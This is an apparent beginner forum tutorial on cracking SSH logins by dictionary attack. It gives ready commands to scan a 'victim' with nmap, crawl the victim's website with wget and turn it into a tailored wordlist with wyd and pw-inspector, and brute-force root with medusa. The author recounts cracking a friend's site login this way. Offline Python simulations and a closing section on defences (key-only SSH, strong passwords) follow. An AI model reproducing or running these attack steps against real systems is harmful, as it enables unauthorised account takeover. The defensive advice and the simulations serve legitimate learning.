Today I will be talking about dictionary attacks. A dictionary attack is a way to crack passwords: it uses a long list of likely passwords and tries each one against a login until one works. I will NOT be talking about web forum attacks, which are pretty much the master level of dictionary attacks. Let's start with the basics.
I will be talking about cracking SSH. SSH is probably the best, and easiest, service to dictionary attack in my opinion. Most of the time the SSH username is "root", so you don't have to worry about testing multiple usernames. To begin, let's nmap our victim.
Nmap is a giant program with more options and extras than I can possibly cover in this mini tutorial, so let's just use a simple nmap command that checks a single port:
nmap -p 22 -Pn -v -sT (victim's IP address here)
Here's a screenie (the pictures didn't upload, see the P.S. at the end):
-p 22 tells nmap to look only at port 22, -Pn skips the ping check so a host that drops pings still gets scanned, -sT does a full TCP connect scan (no root needed), and -v makes it verbose. Because we restricted it to port 22 this does not list all of the victim's open ports; it just tells us whether the victim has SSH.
Wait a few seconds for it to gather information and then look for a line like "22/tcp open ssh". If port 22 is open there is an SSH server listening and you can dictionary attack your victim. Two caveats: SSH can be moved to a port other than 22 (drop the -p 22 to scan the default 1000 ports instead), and a server that only accepts keys, or that locks you out after a few failed logins, will not fall to this no matter how good your wordlist is.
You will now need a wordlist. A wordlist is a list of possible passwords. Basically a wordlist attack keeps trying every word on the list until it succeeds or runs out of words. So you can either use the wordlists from the repo or enjoy making a custom one. I am going to show you how to make a custom one without using harvester. This way you get to see what each step is doing (plus it's more fun). Usually you will want to make a custom wordlist if your victim seems to be interested in a specific genre of activities, because people pick passwords from the things they care about.
For example, a while back a friend of mine wanted to see if I could get into his website. The website was like a wiki type thing for the universe, so I imagined his password would be related to space. I bruteforced the login with my custom wordlist and it WORKED. Here's how:
You will need wget, wyd, pw-inspector (it comes with hydra), and medusa (or hydra) for this.
Make a folder for all your targets and download the site into it. On the phone I keep mine in /var/mobile/victims, so the yellow brick road to the folder is: go into /var, go into mobile, go into the targets folder you made, and then run:
wget -r (the website)
wget -r follows every link on the site and saves each page as a file. On a big site that can take forever and wander off onto other domains; adding -l 2 (limit the depth) and -np (never go above the starting directory) keeps it under control.
Now that you have downloaded the website, let's use wyd to separate out the words. Run this from the folder wyd.pl lives in:
./wyd.pl -n -o /var/mobile/number1.txt /var/mobile/victims
Here's a screenie (not attached, see the P.S.):
This walks every file under /var/mobile/victims, separates out all the words it finds and writes them to number1.txt (-o is the output file). The raw list is full of duplicates, so now we must clean it up.
cat number1.txt | sort | uniq > number2.txt
Here's a picture of the number2 file that I made (not attached, see the P.S.):
uniq only removes duplicate lines that sit next to each other, which is why the list is sorted first; together they leave exactly one copy of every word. (sort -u number1.txt > number2.txt does the same thing in one step.)
Now let's run pw-inspector on it!
cat number2.txt | pw-inspector -m 1 -M 20 > pass.txt
Here's a picture of the pass.txt file (not attached, see the P.S.):
pw-inspector is a filter that ships with hydra: -m is the minimum length and -M the maximum, so this keeps every candidate between 1 and 20 characters and throws the rest away. -m 1 keeps a lot of junk (one- and two-letter words are almost never anyone's password); raising it to -m 4 or higher shrinks the list and saves you attempts. There you go! A custom made list of possible passwords. Now let's start the attack!
medusa -h (victim's ip) -M ssh -u root -P /var/mobile/pass.txt -n 22
Here's a screenie of medusa dictionary attacking (not attached, see the P.S.)!
I use medusa but you can use hydra if you want. Now let me explain, in depth, everything I listed above. You can get medusa from:
ininjas.com/repo from cydia, or for linux: http://www.darknet.org.uk/2007/11/medusa-14-parallel-password-cracker-released-for-download/
-h is the victim's ip address. Nothing special.
-M is the module name. This basically tells medusa which protocol to bruteforce (ssh here).
-u is the username (one fixed username; use -U with a file if you want to try several).
-P is the path to the wordlist file, one password per line.
-n is the port (22 for ssh; change it if nmap found SSH somewhere else).
Two extras worth knowing: -f stops as soon as a valid login is found on the host, and -O (file) appends the results to a log so you don't lose them when the screen scrolls.
That's all you need to know to run your first bruteforce with medusa! Later I will cover parallel attacks and more advanced things!
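To make the whole pipeline above concrete, here is an added example of mine (not code from the tutorial, and not wyd, pw-inspector or medusa themselves) that models each step in plain Python so you can run it offline: a few constructed HTML pages stand in for what wget -r would have saved, extract_words plays the part of wyd, dedupe plays sort | uniq, length_filter plays pw-inspector -m/-M, and dictionary_attack is the loop medusa runs. The SSH server is replaced by a stand-in ssh_login function that accepts one weak password; the host 10.0.0.5 and the password are assumptions for illustration only.

```python
# Added example (mine, not from the tutorial): the whole pipeline above
# (wget -> wyd -> sort|uniq -> pw-inspector -> medusa) modelled in plain
# Python so it runs offline.  The crawled site is a few constructed HTML
# pages and the SSH server is a stand-in function; both are assumptions.
import re

# Constructed stand-in for the files `wget -r` would have saved.
CRAWLED_PAGES = {
    "index.html": (
        "<html><title>Universe Wiki</title><body><h1>Welcome to the Universe Wiki</h1>"
        "<p>Articles on nebula, pulsar, quasar and the Andromeda galaxy.</p></body></html>"
    ),
    "andromeda.html": (
        "<html><body><p>Andromeda is a spiral galaxy 2.5 million light-years away.</p>"
        "<p>See also: Milky Way, Triangulum.</p></body></html>"
    ),
    "nebula.html": (
        "<html><body><p>A nebula is a cloud of gas; the Orion nebula is visible "
        "to the naked eye.</p></body></html>"
    ),
}

TAG_RE = re.compile(r"<[^>]+>")
WORD_RE = re.compile(r"[A-Za-z0-9]+")


def extract_words(pages):
    """Like `wyd.pl -o number1.txt`: strip the tags and pull out every word, duplicates and all."""
    words = []
    for html in pages.values():
        words.extend(WORD_RE.findall(TAG_RE.sub(" ", html)))
    return words


def dedupe(words):
    """Like `sort | uniq`: one copy of each word, in sorted order."""
    return sorted(set(words))


def length_filter(words, min_len, max_len):
    """Like `pw-inspector -m MIN -M MAX`: keep only candidates of a usable length."""
    return [w for w in words if min_len <= len(w) <= max_len]


def build_wordlist(pages, min_len=4, max_len=20):
    """number1.txt -> number2.txt -> pass.txt in one call (min_len=4 drops the 'a', 'is', 'gas' junk)."""
    return length_filter(dedupe(extract_words(pages)), min_len, max_len)


def ssh_login(host, username, password):
    """Stand-in for the real SSH server (assumption): accepts exactly one weak password."""
    return (host, username, password) == ("10.0.0.5", "root", "pulsar")


def dictionary_attack(host, username, wordlist, login=ssh_login):
    """The loop medusa runs for -u root -P pass.txt: try every word in order, stop at the first hit."""
    for attempts, candidate in enumerate(wordlist, start=1):
        if login(host, username, candidate):
            return {"password": candidate, "attempts": attempts}
    return {"password": None, "attempts": len(wordlist)}


if __name__ == "__main__":
    wordlist = build_wordlist(CRAWLED_PAGES)
    print(f"{len(wordlist)} candidates: {wordlist}")
    print(dictionary_attack("10.0.0.5", "root", wordlist))
```

Run it and you get 21 candidates out of three tiny pages, and the attack finds the password on the 17th try. Note that the order of the list matters a lot: with a real target, putting the most likely words first (not just sorted alphabetically) is the difference between a hit in a minute and a lockout.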
P.S. This tutorial is meant for noobs to medusa, so many of you pros may consider it "bad" because you were not taught anything and most of it could have been replaced by Harvester. The most important part of not raising skiddies is making them not use automation for things. Also, if there are any recommendations for me please leave them in the comment section below. And by the way, pictures are a no go because I am having trouble uploading.
How to avoid getting your password bruteforced or dictionary attacked:
Basically, have a strong password on everything that requires one. If you are hosting a website, scan your own server for open ports that belong to login protocols, i.e. telnet or ssh, the same way I did above, or hire a white hat hacker to perform these attacks against your site. If you run SSH, the single best defence against this whole tutorial is to turn off password logins (PasswordAuthentication no in sshd_config) and use keys instead, and to change the root password the moment you install OpenSSH on a jailbroken device.
A secure password consists of numbers and letters and at least one crazy sign, and it is long. A simple word that has no numbers, but is a random word that you think no one will guess, is NOT a secure password: there are wordlists out there with EVERY word in the English language, and other languages as well. Common patterns are also bad, i.e. alex123 or money$. These may seem like "good" passwords because they have numbers or a sign, but a cracker will try a word plus "123" or "$" on its own, so they fall just as fast as the bare word.
If you are paranoid about passwords, try a password generator and a password manager. Just pray that your password manager account doesn't get hacked. Finally, don't use password generator apps like the ones found in cydia; the reason is that people could fake your UDID and get ALL your passwords. You could use programs like the ones listed in the comment section, or you could just have a secure password.
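Here is an added example of mine (not from the post) that shows why alex123 and money$ are not safe even though they have numbers or a sign in them: a cracker does not only try the bare words in its list, it runs "mangling rules" over them, appending the usual digits and symbols, capitalising, reversing. The four base words, the suffix list and the rule order below are constructed for illustration, but the idea is exactly what real crackers do on top of a wordlist like the one built above.

```python
# Added example (mine, not from the post): a few "mangling rules" of the
# kind crackers apply on top of a wordlist.  It shows why alex123 and money$
# are not safe: they are generated from a four-word base list within a couple
# of dozen guesses.  The base words and rules are constructed for illustration.
BASE_WORDS = ["alex", "money", "password", "universe"]  # constructed tiny wordlist
SUFFIXES = ("1", "12", "123", "!", "$", "2012")          # the usual tack-ons


def mangle(word):
    """Yield the word and the cheap variants an attacker tries first."""
    yield word
    yield word.capitalize()
    for suffix in SUFFIXES:
        yield word + suffix
        yield word.capitalize() + suffix
    yield word[::-1]  # reversed


def candidates(base_words=BASE_WORDS):
    """Every mangled candidate, in the order it would be tried, without repeats."""
    seen = set()
    for word in base_words:
        for cand in mangle(word):
            if cand not in seen:
                seen.add(cand)
                yield cand


def guesses_needed(password, base_words=BASE_WORDS):
    """How many guesses until `password` comes up, or None if these rules never produce it."""
    for n, cand in enumerate(candidates(base_words), start=1):
        if cand == password:
            return n
    return None


if __name__ == "__main__":
    for pw in ("alex123", "money$", "Password!", "Tr0ub4dor&3"):
        print(f"{pw!r}: {guesses_needed(pw)}")
```

With just four base words and six suffixes, alex123 is the 7th guess and money$ the 26th; a real rule set has thousands of rules and a wordlist of millions, so anything built from a word plus a tack-on is gone in seconds. A password that these rules never produce (a long random string, or several unrelated words) is what "secure" actually means here.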